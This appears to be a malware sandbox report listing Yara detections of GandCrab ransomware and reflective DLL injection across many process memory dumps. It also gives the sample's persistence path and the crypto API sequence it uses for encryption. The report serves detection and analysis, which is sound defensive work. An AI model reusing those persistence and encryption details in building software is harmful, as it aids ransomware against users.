Source: Yara match	File source: Process Memory Space: wzltxa.exe PID: 6128, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: wzltxa.exe PID: 2156, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: wzltxa.exe PID: 5248, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: wzltxa.exe PID: 1200, type: MEMORYSTR

Source: C:\Users\user\Desktop\mPNVrHIpyt.exe	Code function: 0_2_0F696660 EnterCriticalSection,CryptAcquireContextW,GetLastError,CryptAcquireContextW,CryptImportKey,CryptGetKeyParam,CryptEncrypt,GetLastError,CryptReleaseContext,LeaveCriticalSection,	0_2_0F696660
Source: C:\Users\user\AppData\Roaming\Microsoft\wzltxa.exe	Code function: 11_2_0FBB6660 EnterCriticalSection,CryptAcquireContextW,GetLastError,CryptAcquireContextW,CryptImportKey,CryptGetKeyParam,CryptEncrypt,GetLastError,CryptReleaseContext,LeaveCriticalSection,	11_2_0FBB6660
Source: C:\Users\user\AppData\Roaming\Microsoft\wzltxa.exe	Code function: 12_2_0FBB6660 EnterCriticalSection,CryptAcquireContextW,GetLastError,CryptAcquireContextW,CryptImportKey,CryptGetKeyParam,CryptEncrypt,GetLastError,CryptReleaseContext,LeaveCriticalSection,	12_2_0FBB6660

System Summary

Malicious sample detected (through community Yara rule)

Source: mPNVrHIpyt.exe, type: SAMPLE	Matched rule: detects Reflective DLL injection artifacts Author: ditekSHen
Source: mPNVrHIpyt.exe, type: SAMPLE	Matched rule: Gandcrab Payload Author: kevoreilly
Source: mPNVrHIpyt.exe, type: SAMPLE	Matched rule: Win32_Ransomware_GandCrab Author: ReversingLabs
Source: 33.2.wzltxa.exe.fbb0000.0.unpack, type: UNPACKEDPE	Matched rule: detects Reflective DLL injection artifacts Author: ditekSHen
Source: 33.2.wzltxa.exe.fbb0000.0.unpack, type: UNPACKEDPE	Matched rule: Gandcrab Payload Author: kevoreilly
Source: 33.2.wzltxa.exe.fbb0000.0.unpack, type: UNPACKEDPE	Matched rule: Win32_Ransomware_GandCrab Author: ReversingLabs
Source: 13.3.wzltxa.exe.3270000.0.raw.unpack, type: UNPACKEDPE	Matched rule: detects Reflective DLL injection artifacts Author: ditekSHen
Source: 13.3.wzltxa.exe.3270000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Gandcrab Payload Author: kevoreilly
Source: 13.3.wzltxa.exe.3270000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Win32_Ransomware_GandCrab Author: ReversingLabs
Source: 25.2.wzltxa.exe.fbb0000.0.unpack, type: UNPACKEDPE	Matched rule: detects Reflective DLL injection artifacts Author: ditekSHen
Source: 25.2.wzltxa.exe.fbb0000.0.unpack, type: UNPACKEDPE	Matched rule: Gandcrab Payload Author: kevoreilly
Source: 25.2.wzltxa.exe.fbb0000.0.unpack, type: UNPACKEDPE	Matched rule: Win32_Ransomware_GandCrab Author: ReversingLabs
Source: 25.3.wzltxa.exe.3a00000.0.raw.unpack, type: UNPACKEDPE	Matched rule: detects Reflective DLL injection artifacts Author: ditekSHen
Source: 25.3.wzltxa.exe.3a00000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Gandcrab Payload Author: kevoreilly
Source: 25.3.wzltxa.exe.3a00000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Win32_Ransomware_GandCrab Author: ReversingLabs
Source: 11.0.wzltxa.exe.fbb0000.0.unpack, type: UNPACKEDPE	Matched rule: detects Reflective DLL injection artifacts Author: ditekSHen
Source: 11.0.wzltxa.exe.fbb0000.0.unpack, type: UNPACKEDPE	Matched rule: Gandcrab Payload Author: kevoreilly
Source: 11.0.wzltxa.exe.fbb0000.0.unpack, type: UNPACKEDPE	Matched rule: Win32_Ransomware_GandCrab Author: ReversingLabs
Source: 18.2.wzltxa.exe.fbb0000.0.unpack, type: UNPACKEDPE	Matched rule: detects Reflective DLL injection artifacts Author: ditekSHen
Source: 18.2.wzltxa.exe.fbb0000.0.unpack, type: UNPACKEDPE	Matched rule: Gandcrab Payload Author: kevoreilly
Source: 18.2.wzltxa.exe.fbb0000.0.unpack, type: UNPACKEDPE	Matched rule: Win32_Ransomware_GandCrab Author: ReversingLabs
Source: 22.3.wzltxa.exe.3640000.0.raw.unpack, type: UNPACKEDPE	Matched rule: detects Reflective DLL injection artifacts Author: ditekSHen
Source: 22.3.wzltxa.exe.3640000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Gandcrab Payload Author: kevoreilly
Source: 22.3.wzltxa.exe.3640000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Win32_Ransomware_GandCrab Author: ReversingLabs
Source: 12.0.wzltxa.exe.fbb0000.0.unpack, type: UNPACKEDPE	Matched rule: detects Reflective DLL injection artifacts Author: ditekSHen
Source: 12.0.wzltxa.exe.fbb0000.0.unpack, type: UNPACKEDPE	Matched rule: Gandcrab Payload Author: kevoreilly
Source: 12.0.wzltxa.exe.fbb0000.0.unpack, type: UNPACKEDPE	Matched rule: Win32_Ransomware_GandCrab Author: ReversingLabs
Source: 39.3.wzltxa.exe.4010000.0.unpack, type: UNPACKEDPE	Matched rule: detects Reflective DLL injection artifacts Author: ditekSHen
Source: 39.3.wzltxa.exe.4010000.0.unpack, type: UNPACKEDPE	Matched rule: Gandcrab Payload Author: kevoreilly
Source: 39.3.wzltxa.exe.4010000.0.unpack, type: UNPACKEDPE	Matched rule: Win32_Ransomware_GandCrab Author: ReversingLabs
Source: 15.3.wzltxa.exe.2fa0000.0.raw.unpack, type: UNPACKEDPE	Matched rule: detects Reflective DLL injection artifacts Author: ditekSHen
Source: 15.3.wzltxa.exe.2fa0000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Gandcrab Payload Author: kevoreilly
Source: 15.3.wzltxa.exe.2fa0000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Win32_Ransomware_GandCrab Author: ReversingLabs
Source: 13.0.wzltxa.exe.fbb0000.0.unpack, type: UNPACKEDPE	Matched rule: detects Reflective DLL injection artifacts Author: ditekSHen
Source: 13.0.wzltxa.exe.fbb0000.0.unpack, type: UNPACKEDPE	Matched rule: Gandcrab Payload Author: kevoreilly
Source: 13.0.wzltxa.exe.fbb0000.0.unpack, type: UNPACKEDPE	Matched rule: Win32_Ransomware_GandCrab Author: ReversingLabs
Source: 28.3.wzltxa.exe.38a0000.0.raw.unpack, type: UNPACKEDPE	Matched rule: detects Reflective DLL injection artifacts Author: ditekSHen
Source: 28.3.wzltxa.exe.38a0000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Gandcrab Payload Author: kevoreilly
Source: 28.3.wzltxa.exe.38a0000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Win32_Ransomware_GandCrab Author: ReversingLabs
Source: 0.3.mPNVrHIpyt.exe.3e00000.0.unpack, type: UNPACKEDPE	Matched rule: detects Reflective DLL injection artifacts Author: ditekSHen
Source: 0.3.mPNVrHIpyt.exe.3e00000.0.unpack, type: UNPACKEDPE	Matched rule: Gandcrab Payload Author: kevoreilly
Source: 0.3.mPNVrHIpyt.exe.3e00000.0.unpack, type: UNPACKEDPE	Matched rule: Win32_Ransomware_GandCrab Author: ReversingLabs
Source: 30.0.wzltxa.exe.fbb0000.0.unpack, type: UNPACKEDPE	Matched rule: detects Reflective DLL injection artifacts Author: ditekSHen
Source: 30.0.wzltxa.exe.fbb0000.0.unpack, type: UNPACKEDPE	Matched rule: Gandcrab Payload Author: kevoreilly
Source: 30.0.wzltxa.exe.fbb0000.0.unpack, type: UNPACKEDPE	Matched rule: Win32_Ransomware_GandCrab Author: ReversingLabs
Source: 31.3.wzltxa.exe.3b90000.0.unpack, type: UNPACKEDPE	Matched rule: detects Reflective DLL injection artifacts Author: ditekSHen
Source: 31.3.wzltxa.exe.3b90000.0.unpack, type: UNPACKEDPE	Matched rule: Gandcrab Payload Author: kevoreilly
Source: 31.3.wzltxa.exe.3b90000.0.unpack, type: UNPACKEDPE	Matched rule: Win32_Ransomware_GandCrab Author: ReversingLabs
Source: 11.2.wzltxa.exe.fbb0000.0.unpack, type: UNPACKEDPE	Matched rule: detects Reflective DLL injection artifacts Author: ditekSHen
Source: 11.2.wzltxa.exe.fbb0000.0.unpack, type: UNPACKEDPE	Matched rule: Gandcrab Payload Author: kevoreilly
Source: 11.2.wzltxa.exe.fbb0000.0.unpack, type: UNPACKEDPE	Matched rule: Win32_Ransomware_GandCrab Author: ReversingLabs
Source: 11.3.wzltxa.exe.3940000.0.unpack, type: UNPACKEDPE	Matched rule: detects Reflective DLL injection artifacts Author: ditekSHen
Source: 11.3.wzltxa.exe.3940000.0.unpack, type: UNPACKEDPE	Matched rule: Gandcrab Payload Author: kevoreilly
Source: 11.3.wzltxa.exe.3940000.0.unpack, type: UNPACKEDPE	Matched rule: Win32_Ransomware_GandCrab Author: ReversingLabs
Source: 12.3.wzltxa.exe.3b20000.0.raw.unpack, type: UNPACKEDPE	Matched rule: detects Reflective DLL injection artifacts Author: ditekSHen
Source: 12.3.wzltxa.exe.3b20000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Gandcrab Payload Author: kevoreilly
Source: 12.3.wzltxa.exe.3b20000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Win32_Ransomware_GandCrab Author: ReversingLabs
Source: 39.2.wzltxa.exe.fbb0000.0.unpack, type: UNPACKEDPE	Matched rule: detects Reflective DLL injection artifacts Author: ditekSHen
Source: 39.2.wzltxa.exe.fbb0000.0.unpack, type: UNPACKEDPE	Matched rule: Gandcrab Payload Author: kevoreilly
Source: 39.2.wzltxa.exe.fbb0000.0.unpack, type: UNPACKEDPE	Matched rule: Win32_Ransomware_GandCrab Author: ReversingLabs
Source: 15.3.wzltxa.exe.2fa0000.0.unpack, type: UNPACKEDPE	Matched rule: detects Reflective DLL injection artifacts Author: ditekSHen
Source: 15.3.wzltxa.exe.2fa0000.0.unpack, type: UNPACKEDPE	Matched rule: Gandcrab Payload Author: kevoreilly
Source: 15.3.wzltxa.exe.2fa0000.0.unpack, type: UNPACKEDPE	Matched rule: Win32_Ransomware_GandCrab Author: ReversingLabs
Source: 22.0.wzltxa.exe.fbb0000.0.unpack, type: UNPACKEDPE	Matched rule: detects Reflective DLL injection artifacts Author: ditekSHen
Source: 22.0.wzltxa.exe.fbb0000.0.unpack, type: UNPACKEDPE	Matched rule: Gandcrab Payload Author: kevoreilly
Source: 22.0.wzltxa.exe.fbb0000.0.unpack, type: UNPACKEDPE	Matched rule: Win32_Ransomware_GandCrab Author: ReversingLabs
Source: 12.3.wzltxa.exe.3b20000.0.unpack, type: UNPACKEDPE	Matched rule: detects Reflective DLL injection artifacts Author: ditekSHen
Source: 12.3.wzltxa.exe.3b20000.0.unpack, type: UNPACKEDPE	Matched rule: Gandcrab Payload Author: kevoreilly
Source: 12.3.wzltxa.exe.3b20000.0.unpack, type: UNPACKEDPE	Matched rule: Win32_Ransomware_GandCrab Author: ReversingLabs
Source: 31.0.wzltxa.exe.fbb0000.0.unpack, type: UNPACKEDPE	Matched rule: detects Reflective DLL injection artifacts Author: ditekSHen
Source: 31.0.wzltxa.exe.fbb0000.0.unpack, type: UNPACKEDPE	Matched rule: Gandcrab Payload Author: kevoreilly
Source: 31.0.wzltxa.exe.fbb0000.0.unpack, type: UNPACKEDPE	Matched rule: Win32_Ransomware_GandCrab Author: ReversingLabs
Source: 40.2.wzltxa.exe.fbb0000.0.unpack, type: UNPACKEDPE	Matched rule: detects Reflective DLL injection artifacts Author: ditekSHen
Source: 40.2.wzltxa.exe.fbb0000.0.unpack, type: UNPACKEDPE	Matched rule: Gandcrab Payload Author: kevoreilly
Source: 40.2.wzltxa.exe.fbb0000.0.unpack, type: UNPACKEDPE	Matched rule: Win32_Ransomware_GandCrab Author: ReversingLabs
Source: 33.3.wzltxa.exe.2f00000.0.raw.unpack, type: UNPACKEDPE	Matched rule: detects Reflective DLL injection artifacts Author: ditekSHen
Source: 33.3.wzltxa.exe.2f00000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Gandcrab Payload Author: kevoreilly
Source: 33.3.wzltxa.exe.2f00000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Win32_Ransomware_GandCrab Author: ReversingLabs
Source: 13.3.wzltxa.exe.3270000.0.unpack, type: UNPACKEDPE	Matched rule: detects Reflective DLL injection artifacts Author: ditekSHen
Source: 13.3.wzltxa.exe.3270000.0.unpack, type: UNPACKEDPE	Matched rule: Gandcrab Payload Author: kevoreilly
Source: 13.3.wzltxa.exe.3270000.0.unpack, type: UNPACKEDPE	Matched rule: Win32_Ransomware_GandCrab Author: ReversingLabs
Source: 18.3.wzltxa.exe.3a80000.0.unpack, type: UNPACKEDPE	Matched rule: detects Reflective DLL injection artifacts Author: ditekSHen
Source: 18.3.wzltxa.exe.3a80000.0.unpack, type: UNPACKEDPE	Matched rule: Gandcrab Payload Author: kevoreilly
Source: 18.3.wzltxa.exe.3a80000.0.unpack, type: UNPACKEDPE	Matched rule: Win32_Ransomware_GandCrab Author: ReversingLabs
Source: 11.3.wzltxa.exe.3940000.0.raw.unpack, type: UNPACKEDPE	Matched rule: detects Reflective DLL injection artifacts Author: ditekSHen
Source: 11.3.wzltxa.exe.3940000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Gandcrab Payload Author: kevoreilly
Source: 11.3.wzltxa.exe.3940000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Win32_Ransomware_GandCrab Author: ReversingLabs
Source: 34.2.wzltxa.exe.fbb0000.0.unpack, type: UNPACKEDPE	Matched rule: detects Reflective DLL injection artifacts Author: ditekSHen
Source: 34.2.wzltxa.exe.fbb0000.0.unpack, type: UNPACKEDPE	Matched rule: Gandcrab Payload Author: kevoreilly
Source: 34.2.wzltxa.exe.fbb0000.0.unpack, type: UNPACKEDPE	Matched rule: Win32_Ransomware_GandCrab Author: ReversingLabs
Source: 20.0.wzltxa.exe.fbb0000.0.unpack, type: UNPACKEDPE	Matched rule: detects Reflective DLL injection artifacts Author: ditekSHen
Source: 20.0.wzltxa.exe.fbb0000.0.unpack, type: UNPACKEDPE	Matched rule: Gandcrab Payload Author: kevoreilly
Source: 20.0.wzltxa.exe.fbb0000.0.unpack, type: UNPACKEDPE	Matched rule: Win32_Ransomware_GandCrab Author: ReversingLabs
Source: 0.0.mPNVrHIpyt.exe.f690000.0.unpack, type: UNPACKEDPE	Matched rule: detects Reflective DLL injection artifacts Author: ditekSHen
Source: 0.0.mPNVrHIpyt.exe.f690000.0.unpack, type: UNPACKEDPE	Matched rule: Gandcrab Payload Author: kevoreilly
Source: 0.0.mPNVrHIpyt.exe.f690000.0.unpack, type: UNPACKEDPE	Matched rule: Win32_Ransomware_GandCrab Author: ReversingLabs
Source: 27.2.wzltxa.exe.fbb0000.0.unpack, type: UNPACKEDPE	Matched rule: detects Reflective DLL injection artifacts Author: ditekSHen
Source: 27.2.wzltxa.exe.fbb0000.0.unpack, type: UNPACKEDPE	Matched rule: Gandcrab Payload Author: kevoreilly
Source: 27.2.wzltxa.exe.fbb0000.0.unpack, type: UNPACKEDPE	Matched rule: Win32_Ransomware_GandCrab Author: ReversingLabs
Source: 33.3.wzltxa.exe.2f00000.0.unpack, type: UNPACKEDPE	Matched rule: detects Reflective DLL injection artifacts Author: ditekSHen
Source: 33.3.wzltxa.exe.2f00000.0.unpack, type: UNPACKEDPE	Matched rule: Gandcrab Payload Author: kevoreilly
Source: 33.3.wzltxa.exe.2f00000.0.unpack, type: UNPACKEDPE	Matched rule: Win32_Ransomware_GandCrab Author: ReversingLabs
Source: 25.0.wzltxa.exe.fbb0000.0.unpack, type: UNPACKEDPE	Matched rule: detects Reflective DLL injection artifacts Author: ditekSHen
Source: 25.0.wzltxa.exe.fbb0000.0.unpack, type: UNPACKEDPE	Matched rule: Gandcrab Payload Author: kevoreilly
Source: 25.0.wzltxa.exe.fbb0000.0.unpack, type: UNPACKEDPE	Matched rule: Win32_Ransomware_GandCrab Author: ReversingLabs
Source: 34.0.wzltxa.exe.fbb0000.0.unpack, type: UNPACKEDPE	Matched rule: detects Reflective DLL injection artifacts Author: ditekSHen
Source: 34.0.wzltxa.exe.fbb0000.0.unpack, type: UNPACKEDPE	Matched rule: Gandcrab Payload Author: kevoreilly
Source: 34.0.wzltxa.exe.fbb0000.0.unpack, type: UNPACKEDPE	Matched rule: Win32_Ransomware_GandCrab Author: ReversingLabs
Source: 13.2.wzltxa.exe.fbb0000.0.unpack, type: UNPACKEDPE	Matched rule: detects Reflective DLL injection artifacts Author: ditekSHen
Source: 13.2.wzltxa.exe.fbb0000.0.unpack, type: UNPACKEDPE	Matched rule: Gandcrab Payload Author: kevoreilly
Source: 13.2.wzltxa.exe.fbb0000.0.unpack, type: UNPACKEDPE	Matched rule: Win32_Ransomware_GandCrab Author: ReversingLabs
Source: 39.3.wzltxa.exe.4010000.0.raw.unpack, type: UNPACKEDPE	Matched rule: detects Reflective DLL injection artifacts Author: ditekSHen
Source: 39.3.wzltxa.exe.4010000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Gandcrab Payload Author: kevoreilly
Source: 39.3.wzltxa.exe.4010000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Win32_Ransomware_GandCrab Author: ReversingLabs
Source: 22.3.wzltxa.exe.3640000.0.unpack, type: UNPACKEDPE	Matched rule: detects Reflective DLL injection artifacts Author: ditekSHen
Source: 22.3.wzltxa.exe.3640000.0.unpack, type: UNPACKEDPE	Matched rule: Gandcrab Payload Author: kevoreilly
Source: 22.3.wzltxa.exe.3640000.0.unpack, type: UNPACKEDPE	Matched rule: Win32_Ransomware_GandCrab Author: ReversingLabs
Source: 18.0.wzltxa.exe.fbb0000.0.unpack, type: UNPACKEDPE	Matched rule: detects Reflective DLL injection artifacts Author: ditekSHen
Source: 18.0.wzltxa.exe.fbb0000.0.unpack, type: UNPACKEDPE	Matched rule: Gandcrab Payload Author: kevoreilly
Source: 18.0.wzltxa.exe.fbb0000.0.unpack, type: UNPACKEDPE	Matched rule: Win32_Ransomware_GandCrab Author: ReversingLabs
Source: 28.0.wzltxa.exe.fbb0000.0.unpack, type: UNPACKEDPE	Matched rule: detects Reflective DLL injection artifacts Author: ditekSHen
Source: 28.0.wzltxa.exe.fbb0000.0.unpack, type: UNPACKEDPE	Matched rule: Gandcrab Payload Author: kevoreilly
Source: 28.0.wzltxa.exe.fbb0000.0.unpack, type: UNPACKEDPE	Matched rule: Win32_Ransomware_GandCrab Author: ReversingLabs
Source: 15.2.wzltxa.exe.fbb0000.0.unpack, type: UNPACKEDPE	Matched rule: detects Reflective DLL injection artifacts Author: ditekSHen
Source: 15.2.wzltxa.exe.fbb0000.0.unpack, type: UNPACKEDPE	Matched rule: Gandcrab Payload Author: kevoreilly
Source: 15.2.wzltxa.exe.fbb0000.0.unpack, type: UNPACKEDPE	Matched rule: Win32_Ransomware_GandCrab Author: ReversingLabs
Source: 18.3.wzltxa.exe.3a80000.0.raw.unpack, type: UNPACKEDPE	Matched rule: detects Reflective DLL injection artifacts Author: ditekSHen
Source: 18.3.wzltxa.exe.3a80000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Gandcrab Payload Author: kevoreilly
Source: 18.3.wzltxa.exe.3a80000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Win32_Ransomware_GandCrab Author: ReversingLabs
Source: 31.3.wzltxa.exe.3b90000.0.raw.unpack, type: UNPACKEDPE	Matched rule: detects Reflective DLL injection artifacts Author: ditekSHen
Source: 31.3.wzltxa.exe.3b90000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Gandcrab Payload Author: kevoreilly
Source: 31.3.wzltxa.exe.3b90000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Win32_Ransomware_GandCrab Author: ReversingLabs
Source: 15.0.wzltxa.exe.fbb0000.0.unpack, type: UNPACKEDPE	Matched rule: detects Reflective DLL injection artifacts Author: ditekSHen
Source: 15.0.wzltxa.exe.fbb0000.0.unpack, type: UNPACKEDPE	Matched rule: Gandcrab Payload Author: kevoreilly
Source: 15.0.wzltxa.exe.fbb0000.0.unpack, type: UNPACKEDPE	Matched rule: Win32_Ransomware_GandCrab Author: ReversingLabs
Source: 0.3.mPNVrHIpyt.exe.3e00000.0.raw.unpack, type: UNPACKEDPE	Matched rule: detects Reflective DLL injection artifacts Author: ditekSHen
Source: 0.3.mPNVrHIpyt.exe.3e00000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Gandcrab Payload Author: kevoreilly
Source: 0.3.mPNVrHIpyt.exe.3e00000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Win32_Ransomware_GandCrab Author: ReversingLabs
Source: 20.2.wzltxa.exe.fbb0000.0.unpack, type: UNPACKEDPE	Matched rule: detects Reflective DLL injection artifacts Author: ditekSHen
Source: 30.2.wzltxa.exe.fbb0000.0.unpack, type: UNPACKEDPE	Matched rule: detects Reflective DLL injection artifacts Author: ditekSHen
Source: 20.2.wzltxa.exe.fbb0000.0.unpack, type: UNPACKEDPE	Matched rule: Gandcrab Payload Author: kevoreilly
Source: 20.2.wzltxa.exe.fbb0000.0.unpack, type: UNPACKEDPE	Matched rule: Win32_Ransomware_GandCrab Author: ReversingLabs
Source: 30.2.wzltxa.exe.fbb0000.0.unpack, type: UNPACKEDPE	Matched rule: Gandcrab Payload Author: kevoreilly
Source: 30.2.wzltxa.exe.fbb0000.0.unpack, type: UNPACKEDPE	Matched rule: Win32_Ransomware_GandCrab Author: ReversingLabs
Source: 27.0.wzltxa.exe.fbb0000.0.unpack, type: UNPACKEDPE	Matched rule: detects Reflective DLL injection artifacts Author: ditekSHen
Source: 27.0.wzltxa.exe.fbb0000.0.unpack, type: UNPACKEDPE	Matched rule: Gandcrab Payload Author: kevoreilly
Source: 27.0.wzltxa.exe.fbb0000.0.unpack, type: UNPACKEDPE	Matched rule: Win32_Ransomware_GandCrab Author: ReversingLabs
Source: 25.3.wzltxa.exe.3a00000.0.unpack, type: UNPACKEDPE	Matched rule: detects Reflective DLL injection artifacts Author: ditekSHen
Source: 25.3.wzltxa.exe.3a00000.0.unpack, type: UNPACKEDPE	Matched rule: Gandcrab Payload Author: kevoreilly
Source: 25.3.wzltxa.exe.3a00000.0.unpack, type: UNPACKEDPE	Matched rule: Win32_Ransomware_GandCrab Author: ReversingLabs
Source: 40.0.wzltxa.exe.fbb0000.0.unpack, type: UNPACKEDPE	Matched rule: detects Reflective DLL injection artifacts Author: ditekSHen
Source: 40.0.wzltxa.exe.fbb0000.0.unpack, type: UNPACKEDPE	Matched rule: Gandcrab Payload Author: kevoreilly
Source: 40.0.wzltxa.exe.fbb0000.0.unpack, type: UNPACKEDPE	Matched rule: Win32_Ransomware_GandCrab Author: ReversingLabs
Source: 0.2.mPNVrHIpyt.exe.f690000.0.unpack, type: UNPACKEDPE	Matched rule: detects Reflective DLL injection artifacts Author: ditekSHen
Source: 0.2.mPNVrHIpyt.exe.f690000.0.unpack, type: UNPACKEDPE	Matched rule: Gandcrab Payload Author: kevoreilly
Source: 0.2.mPNVrHIpyt.exe.f690000.0.unpack, type: UNPACKEDPE	Matched rule: Win32_Ransomware_GandCrab Author: ReversingLabs
Source: 22.2.wzltxa.exe.fbb0000.0.unpack, type: UNPACKEDPE	Matched rule: detects Reflective DLL injection artifacts Author: ditekSHen
Source: 22.2.wzltxa.exe.fbb0000.0.unpack, type: UNPACKEDPE	Matched rule: Gandcrab Payload Author: kevoreilly
Source: 22.2.wzltxa.exe.fbb0000.0.unpack, type: UNPACKEDPE	Matched rule: Win32_Ransomware_GandCrab Author: ReversingLabs
Source: 33.0.wzltxa.exe.fbb0000.0.unpack, type: UNPACKEDPE	Matched rule: detects Reflective DLL injection artifacts Author: ditekSHen
Source: 33.0.wzltxa.exe.fbb0000.0.unpack, type: UNPACKEDPE	Matched rule: Gandcrab Payload Author: kevoreilly
Source: 33.0.wzltxa.exe.fbb0000.0.unpack, type: UNPACKEDPE	Matched rule: Win32_Ransomware_GandCrab Author: ReversingLabs
Source: 28.3.wzltxa.exe.38a0000.0.unpack, type: UNPACKEDPE	Matched rule: detects Reflective DLL injection artifacts Author: ditekSHen
Source: 28.3.wzltxa.exe.38a0000.0.unpack, type: UNPACKEDPE	Matched rule: Gandcrab Payload Author: kevoreilly
Source: 28.3.wzltxa.exe.38a0000.0.unpack, type: UNPACKEDPE	Matched rule: Win32_Ransomware_GandCrab Author: ReversingLabs
Source: 28.2.wzltxa.exe.fbb0000.0.unpack, type: UNPACKEDPE	Matched rule: detects Reflective DLL injection artifacts Author: ditekSHen
Source: 28.2.wzltxa.exe.fbb0000.0.unpack, type: UNPACKEDPE	Matched rule: Gandcrab Payload Author: kevoreilly
Source: 28.2.wzltxa.exe.fbb0000.0.unpack, type: UNPACKEDPE	Matched rule: Win32_Ransomware_GandCrab Author: ReversingLabs
Source: 39.0.wzltxa.exe.fbb0000.0.unpack, type: UNPACKEDPE	Matched rule: detects Reflective DLL injection artifacts Author: ditekSHen
Source: 39.0.wzltxa.exe.fbb0000.0.unpack, type: UNPACKEDPE	Matched rule: Gandcrab Payload Author: kevoreilly
Source: 39.0.wzltxa.exe.fbb0000.0.unpack, type: UNPACKEDPE	Matched rule: Win32_Ransomware_GandCrab Author: ReversingLabs
Source: 12.2.wzltxa.exe.fbb0000.0.unpack, type: UNPACKEDPE	Matched rule: detects Reflective DLL injection artifacts Author: ditekSHen
Source: 12.2.wzltxa.exe.fbb0000.0.unpack, type: UNPACKEDPE	Matched rule: Gandcrab Payload Author: kevoreilly
Source: 12.2.wzltxa.exe.fbb0000.0.unpack, type: UNPACKEDPE	Matched rule: Win32_Ransomware_GandCrab Author: ReversingLabs
Source: 31.2.wzltxa.exe.fbb0000.0.unpack, type: UNPACKEDPE	Matched rule: detects Reflective DLL injection artifacts Author: ditekSHen
Source: 31.2.wzltxa.exe.fbb0000.0.unpack, type: UNPACKEDPE	Matched rule: Gandcrab Payload Author: kevoreilly
Source: 31.2.wzltxa.exe.fbb0000.0.unpack, type: UNPACKEDPE	Matched rule: Win32_Ransomware_GandCrab Author: ReversingLabs
Source: 0000001F.00000003.539610642.0000000003B90000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: detects Reflective DLL injection artifacts Author: ditekSHen
Source: 0000001F.00000003.539610642.0000000003B90000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Gandcrab Payload Author: kevoreilly
Source: 0000001F.00000003.539610642.0000000003B90000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Win32_Ransomware_GandCrab Author: ReversingLabs
Source: 0000000C.00000003.343975450.0000000003B20000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: detects Reflective DLL injection artifacts Author: ditekSHen
Source: 0000000C.00000003.343975450.0000000003B20000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Gandcrab Payload Author: kevoreilly
Source: 0000000C.00000003.343975450.0000000003B20000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Win32_Ransomware_GandCrab Author: ReversingLabs
Source: 00000027.00000003.604611550.0000000004010000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: detects Reflective DLL injection artifacts Author: ditekSHen
Source: 00000027.00000003.604611550.0000000004010000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Gandcrab Payload Author: kevoreilly
Source: 00000027.00000003.604611550.0000000004010000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Win32_Ransomware_GandCrab Author: ReversingLabs
Source: 0000001C.00000003.509057598.00000000038A0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: detects Reflective DLL injection artifacts Author: ditekSHen
Source: 0000001C.00000003.509057598.00000000038A0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Gandcrab Payload Author: kevoreilly
Source: 0000001C.00000003.509057598.00000000038A0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Win32_Ransomware_GandCrab Author: ReversingLabs
Source: 00000000.00000003.280650626.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: detects Reflective DLL injection artifacts Author: ditekSHen
Source: 00000000.00000003.280650626.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Gandcrab Payload Author: kevoreilly
Source: 00000000.00000003.280650626.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Win32_Ransomware_GandCrab Author: ReversingLabs
Source: 00000016.00000003.443479124.0000000003640000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: detects Reflective DLL injection artifacts Author: ditekSHen
Source: 00000016.00000003.443479124.0000000003640000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Gandcrab Payload Author: kevoreilly
Source: 00000016.00000003.443479124.0000000003640000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Win32_Ransomware_GandCrab Author: ReversingLabs
Source: 00000012.00000003.405995868.0000000003A80000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: detects Reflective DLL injection artifacts Author: ditekSHen
Source: 00000012.00000003.405995868.0000000003A80000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Gandcrab Payload Author: kevoreilly
Source: 00000012.00000003.405995868.0000000003A80000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Win32_Ransomware_GandCrab Author: ReversingLabs
Source: 00000021.00000003.565723232.0000000002F00000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: detects Reflective DLL injection artifacts Author: ditekSHen
